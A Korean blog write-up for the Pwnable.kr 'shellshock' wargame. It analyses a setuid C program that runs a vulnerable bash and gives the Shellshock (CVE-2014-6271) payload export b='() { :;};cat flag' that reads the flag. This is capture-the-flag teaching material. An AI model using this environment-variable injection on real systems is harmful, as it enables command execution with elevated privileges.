[문제]
[풀이]
보호기법 분석
- 64bits 바이너리
- 카나리 없음
- NX bits 존재
- PIE 없음
소스코드 분석 - shellshock.c
#include <stdio.h>
int main(){
setresuid(getegid(), getegid(), getegid());
setresgid(getegid(), getegid(), getegid());
system("/home/shellshock/bash -c 'echo shock_me'");
return 0;
}
- 소스코드는 굉장히 간단함
- 권한을 일시적으로 상승시켜서 /home/shellshock/bash를 실행함
- shellshock 취약점 공격 원리는 export로 정의하는 환경 변수 속에 명령을 집어넣는 것!
- 뭔가.. 옛날에 적었던 풀이가 더 잘적은 것 같다..ㅎ 풀이 적다가 지우고 그냥 첨부함!(shellshock)
문제 해결
💡 export b='() { :;};cat flag’
flag
🍒 only if I knew CVE-2014-6271 ten years ago..!!
'Wargame > Pwnable.kr' 카테고리의 다른 글
[Pwnable.kr] lotto (0) | 2022.10.15 |
---|---|
[Pwnable.kr] blackjack (2) | 2022.10.15 |
[Pwnable.kr] mistake (2) | 2022.10.15 |
[Pwnable.kr] leg (2) | 2022.10.15 |
[Pwnable.kr] input (2) | 2022.10.15 |